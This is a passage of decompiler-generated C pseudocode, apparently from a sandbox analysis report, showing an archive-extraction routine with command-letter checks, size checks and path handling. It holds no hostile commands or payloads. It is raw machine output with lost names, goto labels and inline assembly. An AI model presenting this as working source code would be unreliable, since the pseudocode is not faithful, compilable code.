                									_t35 = _t706 - 0x51a8; // -18856
                									_t36 = _t706 - 0x11; // 0x7ef
                									_t374 = E00CA5C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
                									__eflags = _t374;
                									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
                									 *(_t706 - 0x10) = _t375;
                									__eflags = _t375;
                									if(_t375 != 0) {
                										__eflags =  *(_t706 - 0x11);
                										if( *(_t706 - 0x11) == 0) {
                											__eflags = 0;
                											 *((char*)(_t683 + 0xf1)) = 0;
                										}
                									}
                									E00CA1F1B(_t574);
                									_push(0x800);
                									_t43 = _t706 - 0x113c; // -2364
                									_push(_t574 + 0x22a8);
                									E00CAAFA3();
                									__eflags =  *((char*)(_t574 + 0x3373));
                									 *(_t706 - 0x1c) = 1;
                									if( *((char*)(_t574 + 0x3373)) == 0) {
                										_t380 = E00CA2005(_t574);
                										__eflags = _t380;
                										if(_t380 == 0) {
                											_t548 =  *(_t683 + 8);
                											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
                											asm("sbb al, al");
                											_t61 = _t706 - 0x10;
                											 *_t61 =  *(_t706 - 0x10) &  !_t548;
                											__eflags =  *_t61;
                										}
                									} else {
                										_t551 =  *( *(_t683 + 8) + 0x72bc);
                										__eflags = _t551 - 1;
                										if(_t551 != 1) {
                											__eflags =  *(_t706 - 0x11);
                											if( *(_t706 - 0x11) == 0) {
                												__eflags = _t551;
                												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
                												_push(0);
                												_t54 = _t706 - 0x113c; // -2364
                												_t556 = E00CAB8F2(_t54);
                												_t656 =  *(_t683 + 8);
                												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
                												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
                													 *(_t706 - 0x10) = 0;
                												} else {
                													_t57 = _t706 - 0x113c; // -2364
                													_push(1);
                													E00CAB8F2(_t57);
                												}
                											}
                										}
                									}
                									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
                									 *((char*)(_t683 + 0x60)) = 0;
                									asm("sbb eax, [ebx+0x32dc]");
                									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
                									_t667 = 0;
                									_t385 = 0;
                									 *(_t706 + 0xb) = 0;
                									 *(_t706 + 0xc) = 0;
                									__eflags =  *(_t706 - 0x10);
                									if( *(_t706 - 0x10) != 0) {
                										L43:
                										_t692 =  *(_t706 - 0x18);
                										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
                										_t387 = 0x49;
                										__eflags = _t586;
                										if(_t586 == 0) {
                											L45:
                											_t388 = _t667;
                											L46:
                											__eflags = _t586;
                											_t82 = _t706 - 0x113c; // -2364
                											_t392 = E00CB0FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
                											__eflags = _t392;
                											if(__eflags == 0) {
                												L219:
                												_t393 = 0;
                												L16:
                												L17:
                												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
                												return _t393;
                											}
                											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
                											_t85 = _t706 - 0x113c; // -2364
                											E00CA80B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
                											__eflags =  *(_t706 + 0xb);
                											if( *(_t706 + 0xb) != 0) {
                												L50:
                												 *(_t706 + 0xf) = 0;
                												L51:
                												_t398 =  *(_t683 + 8);
                												_t589 = 0x45;
                												__eflags =  *((char*)(_t398 + 0x6153));
                												_t668 = 0x58;
                												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
                												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
                												if( *((char*)(_t398 + 0x6153)) != 0) {
                													L53:
                													__eflags = _t692 - _t589;
                													if(_t692 == _t589) {
                														L55:
                														_t96 = _t706 - 0x31a8; // -10664
                														E00CA6EF9(_t96);
                														_push(0);
                														_t97 = _t706 - 0x31a8; // -10664
                														_t403 = E00CAA1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
                														__eflags = _t403;
                														if(_t403 == 0) {
                															_t404 =  *(_t683 + 8);
                															__eflags =  *((char*)(_t404 + 0x6153));
                															_t108 = _t706 + 0xf;
                															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
                															__eflags =  *_t108;
                															L61:
                															_t110 = _t706 - 0x113c; // -2364
                															_t408 = E00CA7BE2(_t110, _t574, _t110);
                															__eflags = _t408;
                															if(_t408 != 0) {
                																while(1) {
                																	__eflags =  *((char*)(_t574 + 0x331b));
                																	if( *((char*)(_t574 + 0x331b)) == 0) {
                																		goto L65;
                																	}
                																	_t115 = _t706 - 0x113c; // -2364
                																	_t541 = E00CA807D(_t683, _t574);
                																	__eflags = _t541;
                																	if(_t541 == 0) {
                																		 *((char*)(_t683 + 0x20f6)) = 1;
                																		goto L219;
                																	}
                																	L65:
                																	_t117 = _t706 - 0x13c; // 0x6c4
                																	_t592 = 0x40;
                																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
                																	_t710 = _t708 + 0xc;
                																	asm("movsw");
                																	_t120 = _t706 - 0x2c; // 0x7d4
                																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
                																	 *(_t706 - 4) = 0;
                																	asm("sbb ecx, ecx");
                																	_t127 = _t706 - 0x13c; // 0x6c4
                																	E00CAC634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
                																	__eflags =  *((char*)(_t574 + 0x331b));
                																	if( *((char*)(_t574 + 0x331b)) == 0) {
                																		L73:
                																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                																		_t146 = _t706 - 0x13c; // 0x6c4
                																		L00CAE724(_t146);
                																		_t147 = _t706 - 0x2160; // -6496
                																		E00CA943C(_t147);
                																		_t418 =  *(_t574 + 0x3380);
                																		 *(_t706 - 4) = 1;
                																		 *(_t706 - 0x24) = _t418;
                																		_t670 = 0x50;
                																		__eflags = _t418;
                																		if(_t418 == 0) {
                																			L83:
                																			_t419 = E00CA2005(_t574);
                																			__eflags = _t419;
                																			if(_t419 == 0) {
                																				_t601 =  *(_t706 + 0xf);
                																				__eflags = _t601;
                																				if(_t601 == 0) {
                																					_t696 =  *(_t706 - 0x18);
                																					L96:
                																					__eflags =  *((char*)(_t574 + 0x6cb4));
                																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
                																						__eflags = _t601;
                																						if(_t601 == 0) {
                																							L212:
                																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                																							_t358 = _t706 - 0x2160; // -6496
                																							E00CA946E(_t358);
                																							__eflags =  *(_t706 - 0x10);
                																							_t385 =  *(_t706 + 0xf);
                																							_t671 =  *(_t706 + 0xb);
                																							if( *(_t706 - 0x10) != 0) {
                																								_t362 = _t683 + 0xec;
                																								 *_t362 =  *(_t683 + 0xec) + 1;
                																								__eflags =  *_t362;
                																							}
                																							L214:
                																							__eflags =  *((char*)(_t683 + 0x60));
                																							if( *((char*)(_t683 + 0x60)) != 0) {
                																								goto L219;
                																							}
                																							__eflags = _t385;
                																							if(_t385 != 0) {
                																								L15:
                																								_t393 = 1;
                																								goto L16;
                																							}
                																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
                																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
                																								__eflags = _t671;
                																								if(_t671 != 0) {
                																									goto L15;
                																								}
                																								goto L219;
                																							}
                																							L217:
                																							E00CA1E3B(_t574);
                																							goto L15;
                																						}
                																						L101:
                																						_t422 =  *(_t683 + 8);
                																						__eflags =  *((char*)(_t422 + 0x61f9));
                																						if( *((char*)(_t422 + 0x61f9)) == 0) {
                																							L103:
                																							_t423 =  *(_t706 + 0xb);
                																							__eflags = _t423;
                																							if(_t423 != 0) {
                																								L108:
                																								 *((char*)(_t706 - 0xf)) = 1;
                																								__eflags = _t423;
                																								if(_t423 != 0) {
                																									L110:
                																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
                																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
                																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
                																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
                																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
                																									E00CAA728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
                																									E00CAA728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
                																									_t698 = _t683 + 0x10;
                																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
                																									_t217 = _t706 - 0x2160; // -6496
                																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
                																									E00CAC67C(_t698, _t574, _t217);
                																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
                																									_t608 = 0;
                																									_t432 =  *(_t706 + 0xb);
                																									 *((char*)(_t683 + 0x39)) = _t672;
                																									 *((char*)(_t683 + 0x3a)) = _t432;
                																									 *(_t706 - 0x1c) = 0;
                																									 *(_t706 - 0x28) = 0;
                																									__eflags = _t672;
                																									if(_t672 != 0) {
                																										L127:
                																										_t673 =  *(_t683 + 8);
                																										__eflags =  *((char*)(_t673 + 0x6198));
                																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
                																										__eflags =  *((char*)(_t706 - 0xf));
                																										if( *((char*)(_t706 - 0xf)) != 0) {
                																											L131:
                																											_t434 = 1;
                																											__eflags = 1;
                																											L132:
                																											__eflags =  *(_t706 - 0x24);
                																											 *((char*)(_t706 - 0xe)) = _t608;
                																											 *((char*)(_t706 - 0x12)) = _t434;
                																											 *((char*)(_t706 - 0xd)) = _t434;
                																											if( *(_t706 - 0x24) == 0) {
                																												__eflags =  *(_t574 + 0x3318);
                																												if( *(_t574 + 0x3318) == 0) {
                																													__eflags =  *((char*)(_t574 + 0x22a0));
                																													if(__eflags != 0) {
                																														E00CB2842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
                																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
                																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
                																														__eflags = 0;
                																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
                																														 *((char*)(_t472 + 0x4c60)) = 0;
                																														E00CB24D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
                																													} else {
                																														_push( *(_t574 + 0x32e4));
                																														_push( *(_t574 + 0x32e0));
                																														_push(_t698);
                																														E00CA910B(_t574, _t673, _t683, __eflags);
                																													}
                																												}
                																												L163:
                																												E00CA1E3B(_t574);
                																												__eflags =  *((char*)(_t574 + 0x3319));
                																												if( *((char*)(_t574 + 0x3319)) != 0) {
                																													L166:
                																													_t436 = 0;
                																													__eflags = 0;
                																													_t610 = 0;
                																													L167:
                																													__eflags =  *(_t574 + 0x3370);
                																													if( *(_t574 + 0x3370) != 0) {
                																														__eflags =  *((char*)(_t574 + 0x22a0));
                																														if( *((char*)(_t574 + 0x22a0)) == 0) {
                																															L175:
                																															__eflags =  *(_t706 + 0xb);
                																															 *((char*)(_t706 - 0xe)) = _t436;
                																															if( *(_t706 + 0xb) != 0) {
                																																L185:
                																																__eflags =  *(_t706 - 0x24);
                																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
                																																if( *(_t706 - 0x24) == 0) {
                																																	L189:
                																																	_t611 = 0;
                																																	__eflags = 0;
                																																	L190:
                																																	__eflags =  *((char*)(_t706 - 0xf));
                																																	if( *((char*)(_t706 - 0xf)) != 0) {
                																																		goto L212;
                																																	}
                																																	_t699 =  *(_t706 - 0x18);
                																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
                																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
                																																		L193:
                																																		__eflags =  *(_t706 - 0x24);
                																																		if( *(_t706 - 0x24) == 0) {
                																																			L197:
                																																			__eflags = _t436;
                																																			if(_t436 == 0) {
                																																				L200:
                																																				__eflags = _t611;
                																																				if(_t611 != 0) {
                																																					L208:
                																																					_t437 =  *(_t683 + 8);
                																																					__eflags =  *((char*)(_t437 + 0x61a0));
                																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
                																																						_t700 = _t683 + 0x10f6;
                																																						_t438 = E00CAA12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
                																																						__eflags = _t438;
                																																						if(__eflags == 0) {
                																																							E00CA6BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
                																																						}
                																																					}
                																																					 *(_t683 + 0x10f5) = 1;
                																																					goto L212;
                																																				}
                																																				_t675 =  *(_t706 - 0x28);
                																																				__eflags = _t675;
                																																				_t613 =  *(_t706 - 0x1c);
                																																				if(_t675 > 0) {
                																																					L203:
                																																					__eflags = _t436;
                																																					if(_t436 != 0) {
                																																						L206:
                																																						_t331 = _t706 - 0x2160; // -6496
                																																						E00CA9BD6(_t331);
                																																						L207:
                																																						_t688 = _t574 + 0x32c0;
                																																						asm("sbb eax, eax");
                																																						asm("sbb ecx, ecx");
                																																						asm("sbb eax, eax");
                																																						_t339 = _t706 - 0x2160; // -6496
                																																						E00CA9A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
                																																						_t340 = _t706 - 0x2160; // -6496
                																																						E00CA94DA(_t340);
                																																						E00CA7A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
                																																						asm("sbb eax, eax");
                																																						asm("sbb eax, eax");
                																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
                																																						E00CA9A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
                																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
                																																						goto L208;
                																																					}
                																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
                																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
                																																						goto L206;
                																																					}
                																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
                																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
                																																						goto L207;
                																																					}
                																																					goto L206;
                																																				}
                																																				__eflags = _t613;
                																																				if(_t613 == 0) {
                																																					goto L207;
                																																				}
                																																				goto L203;
                																																			}
                																																			_t460 =  *(_t683 + 8);
                																																			__eflags =  *((char*)(_t460 + 0x6198));
                																																			if( *((char*)(_t460 + 0x6198)) == 0) {
                																																				goto L212;
                																																			}
                																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
                																																			goto L200;
                																																		}
                																																		__eflags = _t611;
                																																		if(_t611 != 0) {
                																																			goto L197;
                																																		}
                																																		__eflags =  *(_t574 + 0x3380) - 5;
                																																		if( *(_t574 + 0x3380) != 5) {
                																																			goto L212;
                																																		}
                																																		__eflags = _t674;
                																																		if(_t674 == 0) {
                																																			goto L212;
                																																		}
                																																		goto L197;
                																																	}
                																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
                																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
                																																		goto L212;
                																																	}
                																																	goto L193;
                																																}
                																																__eflags =  *(_t574 + 0x3380) - 4;
                																																if( *(_t574 + 0x3380) != 4) {
                																																	goto L189;
                																																}
                																																__eflags = _t674;
                																																if(_t674 == 0) {
                																																	goto L189;
                																																}
                																																_t611 = 1;
                																																goto L190;
                																															}
                																															__eflags =  *((char*)(_t706 - 0x12));
                																															if( *((char*)(_t706 - 0x12)) == 0) {
                																																goto L185;
                																															}
                																															__eflags = _t610;
                																															if(_t610 != 0) {
                																																goto L185;
                																															}
                																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
                																															if(__eflags == 0) {
                																																L183:
                																																_t311 = _t706 - 0x113c; // -2364
                																																_push(_t574 + 0x1e);
                																																_push(3);
                																																L184:
                																																E00CA6BF5(__eflags);
                																																 *((char*)(_t706 - 0xe)) = 1;
                																																E00CA6E03(0xce00e0, 3);
                																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
                																																goto L185;
                																															}
                																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
                																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
                																																L181:
                																																__eflags =  *((char*)(_t683 + 0xf3));
                																																if(__eflags != 0) {
                																																	goto L183;
                																																}
                																																_t309 = _t706 - 0x113c; // -2364
                																																_push(_t574 + 0x1e);
                																																_push(4);
                																																goto L184;
                																															}
                																															__eflags =  *(_t574 + 0x6cc4) - _t610;
                																															if(__eflags == 0) {
                																																goto L183;
                																															}
                																															goto L181;
                																														}
                																														__eflags =  *(_t574 + 0x32e4) - _t436;
                																														if(__eflags < 0) {
                																															goto L175;
                																														}
                																														if(__eflags > 0) {
                																															L173:
                																															__eflags = _t610;
                																															if(_t610 != 0) {
                																																 *((char*)(_t683 + 0xf3)) = 1;
                																															}
                																															goto L175;
                																														}
                																														__eflags =  *(_t574 + 0x32e0) - _t436;
                																														if( *(_t574 + 0x32e0) <= _t436) {
                																															goto L175;
                																														}
                																														goto L173;
                																													}
                																													 *((char*)(_t683 + 0xf3)) = _t436;
                																													goto L175;
                																												}
                																												asm("sbb edx, edx");
                																												_t469 = E00CAA6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
                																												__eflags = _t469;
                																												if(_t469 == 0) {
                																													goto L166;
                																												}
                																												_t610 = 1;
                																												_t436 = 0;
                																												goto L167;
                																											}
                																											_t702 =  *(_t574 + 0x3380);
                																											__eflags = _t702 - 4;
                																											if(__eflags == 0) {
                																												L146:
                																												_t262 = _t706 - 0x41a8; // -14760
                																												E00CA80B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
                																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
                																												__eflags = _t608;
                																												if(_t608 == 0) {
                																													L153:
                																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
                																													L154:
                																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
                																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
                																														L141:
                																														__eflags = _t608;
                																														if(_t608 == 0) {
                																															L157:
                																															_t480 = 0;
                																															__eflags = 0;
                																															L158:
                																															 *(_t683 + 0x10f5) = _t480;
                																															goto L163;
                																														}
                																														L142:
                																														__eflags = _t479;
                																														if(_t479 == 0) {
                																															goto L157;
                																														}
                																														_t480 = 1;
                																														goto L158;
                																													}
                																													__eflags = _t608;
                																													if(_t608 != 0) {
                																														goto L142;
                																													}
                																													L140:
                																													 *((char*)(_t706 - 0x12)) = 0;
                																													goto L141;
                																												}
                																												__eflags =  *((short*)(_t706 - 0x41a8));
                																												if( *((short*)(_t706 - 0x41a8)) == 0) {
                																													goto L153;
                																												}
                																												_t266 = _t706 - 0x41a8; // -14760
                																												_push(0x800);
                																												_push(_t683 + 0x10f6);
                																												__eflags = _t702 - 4;
                																												if(__eflags != 0) {
                																													_push(_t574 + 0x1e);
                																													_t269 = _t706 - 0x2160; // -6496
                																													_t479 = E00CA9049(_t673, __eflags);
                																												} else {
                																													_t479 = E00CA74DD(_t608, __eflags);
                																												}
                																												L151:
                																												 *((char*)(_t706 - 0xd)) = _t479;
                																												__eflags = _t479;
                																												if(_t479 == 0) {
                																													L139:
                																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
                																													goto L140;
                																												}
                																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
                																												goto L154;
                																											}
                																											__eflags = _t702 - 5;
                																											if(__eflags == 0) {
                																												goto L146;
                																											}
                																											__eflags = _t702 - _t434;
                																											if(_t702 == _t434) {
                																												L144:
                																												__eflags = _t608;
                																												if(_t608 == 0) {
                																													goto L153;
                																												}
                																												_push(_t683 + 0x10f6);
                																												_t479 = E00CA774C(_t673, _t683 + 0x10, _t574);
                																												goto L151;
                																											}
                																											__eflags = _t702 - 2;
                																											if(_t702 == 2) {
                																												goto L144;
                																											}
                																											__eflags = _t702 - 3;
                																											if(__eflags == 0) {
                																												goto L144;
                																											}
                																											E00CA6BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
                																											__eflags = 0;
                																											_t479 = 0;
                																											 *((char*)(_t706 - 0xd)) = 0;
                																											goto L139;
                																										}
                																										__eflags = _t432;
                																										if(_t432 != 0) {
                																											goto L131;
                																										}
                																										_t491 = 0x50;
                																										__eflags =  *(_t706 - 0x18) - _t491;
                																										if( *(_t706 - 0x18) == _t491) {
                																											goto L131;
                																										}
                																										_t434 = 1;
                																										_t608 = 1;
                																										goto L132;
                																									}
                																									__eflags =  *(_t574 + 0x6cc4);
                																									if( *(_t574 + 0x6cc4) != 0) {
                																										goto L127;
                																									}
                																									_t703 =  *(_t574 + 0x32e4);
                																									_t681 =  *(_t574 + 0x32e0);
                																									__eflags = _t703;
                																									if(__eflags < 0) {
                																										L126:
                																										_t698 = _t683 + 0x10;
                																										goto L127;
                																									}
                																									if(__eflags > 0) {
                																										L115:
                																										_t631 =  *(_t574 + 0x32d8);
                																										_t632 = _t631 << 0xa;
                																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
                																										if(__eflags < 0) {
                																											L125:
                																											_t432 =  *(_t706 + 0xb);
                																											_t608 = 0;
                																											__eflags = 0;
                																											goto L126;
                																										}
                																										if(__eflags > 0) {
                																											L118:
                																											__eflags = _t703;
                																											if(__eflags < 0) {
                																												L124:
                																												_t237 = _t706 - 0x2160; // -6496
                																												E00CA98D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
                																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
                																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
                																												goto L125;
                																											}
                																											if(__eflags > 0) {
                																												L121:
                																												_t499 = E00CA96E1(_t681);
                																												__eflags = _t681 -  *(_t574 + 0x32dc);
                																												if(__eflags < 0) {
                																													goto L125;
                																												}
                																												if(__eflags > 0) {
                																													goto L124;
                																												}
                																												__eflags = _t499 -  *(_t574 + 0x32d8);
                																												if(_t499 <=  *(_t574 + 0x32d8)) {
                																													goto L125;
                																												}
                																												goto L124;
                																											}
                																											__eflags = _t681 - 0x5f5e100;
                																											if(_t681 < 0x5f5e100) {
                																												goto L124;
                																											}
                																											goto L121;
                																										}
                																										__eflags = _t632 - _t681;
                																										if(_t632 <= _t681) {
                																											goto L125;
                																										}
                																										goto L118;
                																									}
                																									__eflags = _t681 - 0xf4240;
                																									if(_t681 <= 0xf4240) {
                																										goto L126;
                																									}
                																									goto L115;
                																								}
                																								L109:
                																								_t198 = _t683 + 0xe4;
                																								 *_t198 =  *(_t683 + 0xe4) + 1;
                																								__eflags =  *_t198;
                																								goto L110;
                																							}
                																							 *((char*)(_t706 - 0xf)) = 0;
                																							_t501 = 0x50;
                																							__eflags = _t696 - _t501;
                																							if(_t696 != _t501) {
                																								_t192 = _t706 - 0x2160; // -6496
                																								__eflags = E00CA9745(_t192);
                																								if(__eflags != 0) {
                																									E00CA6BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
                																									E00CA6E9B(0xce00e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
                																								}
                																							}
                																							goto L109;
                																						}
                																						 *(_t683 + 0x10f5) = 1;
                																						__eflags =  *((char*)(_t422 + 0x61f9));
                																						if( *((char*)(_t422 + 0x61f9)) != 0) {
                																							_t423 =  *(_t706 + 0xb);
                																							goto L108;
                																						}
                																						goto L103;
                																					}
                																					 *(_t706 + 0xb) = 1;
                																					 *(_t706 + 0xf) = 1;
                																					_t182 = _t706 - 0x113c; // -2364
                																					_t511 = E00CB0FD9(_t601, _t182, 0, 0, 1);
                																					__eflags = _t511;
                																					if(_t511 != 0) {
                																						goto L101;
                																					}
                																					__eflags = 0;
                																					 *(_t706 - 0x1c) = 0;
                																					L99:
                																					_t184 = _t706 - 0x2160; // -6496
                																					E00CA946E(_t184);
                																					_t393 =  *(_t706 - 0x1c);
                																					goto L16;
                																				}
                																				_t174 = _t706 - 0x2160; // -6496
                																				_push(_t574);
                																				_t515 = E00CA7F5F(_t683);
                																				_t696 =  *(_t706 - 0x18);
                																				_t601 = _t515;
                																				 *(_t706 + 0xf) = _t601;
                																				L93:
                																				__eflags = _t601;
                																				if(_t601 != 0) {
                																					goto L101;
                																				}
                																				goto L96;
                																			}
                																			__eflags =  *(_t706 + 0xf);
                																			if( *(_t706 + 0xf) != 0) {
                																				_t516 =  *(_t706 - 0x18);
                																				__eflags = _t516 - 0x50;
                																				if(_t516 != 0x50) {
                																					_t639 = 0x49;
                																					__eflags = _t516 - _t639;
                																					if(_t516 != _t639) {
                																						_t640 = 0x45;
                																						__eflags = _t516 - _t640;
                																						if(_t516 != _t640) {
                																							_t517 =  *(_t683 + 8);
                																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
                																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
                																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
                																								_t172 = _t706 - 0x113c; // -2364
                																								_push(_t574);
                																								E00CA7D9B(_t683);
                																							}
                																						}
                																					}
                																				}
                																			}
                																			goto L99;
                																		}
                																		__eflags = _t418 - 5;
                																		if(_t418 == 5) {
                																			goto L83;
                																		}
                																		_t601 =  *(_t706 + 0xf);
                																		_t696 =  *(_t706 - 0x18);
                																		__eflags = _t601;
                																		if(_t601 == 0) {
                																			goto L96;
                																		}
                																		__eflags = _t696 - _t670;
                																		if(_t696 == _t670) {
                																			goto L93;
                																		}
                																		_t520 =  *(_t683 + 8);
                																		__eflags =  *((char*)(_t520 + 0x61f9));
                																		if( *((char*)(_t520 + 0x61f9)) != 0) {
                																			goto L93;
                																		}
                																		 *((char*)(_t706 - 0xf)) = 0;
                																		_t523 = E00CA9E6B(_t683 + 0x10f6);
                																		__eflags = _t523;
                																		if(_t523 == 0) {
                																			L81:
                																			__eflags =  *((char*)(_t706 - 0xf));
                																			if( *((char*)(_t706 - 0xf)) == 0) {
                																				_t601 =  *(_t706 + 0xf);
                																				goto L93;
                																			}
                																			L82:
                																			_t601 = 0;
                																			 *(_t706 + 0xf) = 0;
                																			goto L93;
                																		}
                																		__eflags =  *((char*)(_t706 - 0xf));
                																		if( *((char*)(_t706 - 0xf)) != 0) {
                																			goto L82;
                																		}
                																		__eflags = 0;
                																		_push(0);
                																		_push(_t574 + 0x32c0);
                																		_t160 = _t706 - 0xf; // 0x7f1
                																		E00CA919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
                																		goto L81;
                																	}
                																	__eflags =  *((char*)(_t574 + 0x3341));
                																	if( *((char*)(_t574 + 0x3341)) == 0) {
                																		goto L73;
                																	}
                																	_t132 = _t706 - 0x2c; // 0x7d4
                																	_t531 = E00CBF3CA(_t574 + 0x3342, _t132, 8);
                																	_t708 = _t710 + 0xc;
                																	__eflags = _t531;
                																	if(_t531 == 0) {
                																		goto L73;
                																	}
                																	__eflags =  *(_t574 + 0x6cc4);
                																	if( *(_t574 + 0x6cc4) != 0) {
                																		goto L73;
                																	}
                																	__eflags =  *((char*)(_t683 + 0x10f4));
                																	_t136 = _t706 - 0x113c; // -2364
                																	_push(_t574 + 0x1e);
                																	if(__eflags != 0) {
                																		_push(6);
                																		E00CA6BF5(__eflags);
                																		E00CA6E03(0xce00e0, 0xb);
                																		__eflags = 0;
                																		 *(_t706 + 0xf) = 0;
                																		goto L73;
                																	}
                																	_push(0x7d);
                																	E00CA6BF5(__eflags);
                																	E00CAE797( *(_t683 + 8) + 0x5024);
                																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                																	_t141 = _t706 - 0x13c; // 0x6c4
                																	L00CAE724(_t141);
                																}
                															}
                															E00CA6E03(0xce00e0, 2);
                															_t543 = E00CA1E3B(_t574);
                															__eflags =  *((char*)(_t574 + 0x6cb4));
                															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
                															goto L16;
                														}
                														_t100 = _t706 - 0x2198; // -6552
